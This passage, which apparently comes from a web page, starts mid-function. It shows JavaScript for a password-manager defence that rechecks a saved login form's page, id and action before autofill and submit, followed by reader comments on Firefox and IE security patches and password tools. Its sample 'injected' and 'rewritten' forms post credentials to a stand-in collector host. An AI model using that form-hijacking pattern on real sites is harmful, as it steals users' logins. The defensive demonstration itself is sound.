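  if (!wasAutofilled) return "submit"; // the user typed the credentials
  return shouldAutofill(savedTriple, form) ? "submit" : "warn";
}

// Constructed sample: triple recorded when the user saved the login.
const saved = formTriple("https://login.example.test/signin", "login", "/session");

const genuine = { pageUrl: "https://login.example.test/signin", id: "login",
                  action: "/session" };
// Form on a user-content page of the same site, posting to another host.
const injected = { pageUrl: "https://login.example.test/profile/123", id: "login",
                   action: "https://collector.invalid/c" };
// Form that matched at fill time but whose action was changed before submit.
const rewritten = { ...genuine, action: "https://collector.invalid/c" };

function demo() {
  return {
    fillGenuine: shouldAutofill(saved, genuine),
    fillInjected: shouldAutofill(saved, injected),
    submitGenuine: submitDecision(saved, genuine, true),
    submitRewritten: submitDecision(saved, rewritten, true),
    submitTyped: submitDecision(saved, rewritten, false),
  };
}

console.log(demo());
```

Comparing again at submit time is what covers the case the comment raises, where the action attribute changes after the fields have been populated.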
The clock is ticking... will Firefox beat IE's response time?
according to secunia, IE7 has more severe bugs unpatched, the most severe also affects IE6 and is known since 2006-10-30
http://secunia.com/product/12366/?task=advisories
http://secunia.com/product/12434/?task=advisories
better than any password manager: http://www.passwordmaker.org/
in this age of communication i'm just not getting through
It also won't work on sites that force you to enter your password using buttons (randomly arranged or static). Many banks do this now.
These posts express my own personal views, not those of my employer
Yes, viruses can only spread via sneezes. Oh, don't forget the good old, I/O shutdown.
But didn't buy the t-shirt
Support my political activism on Patreon.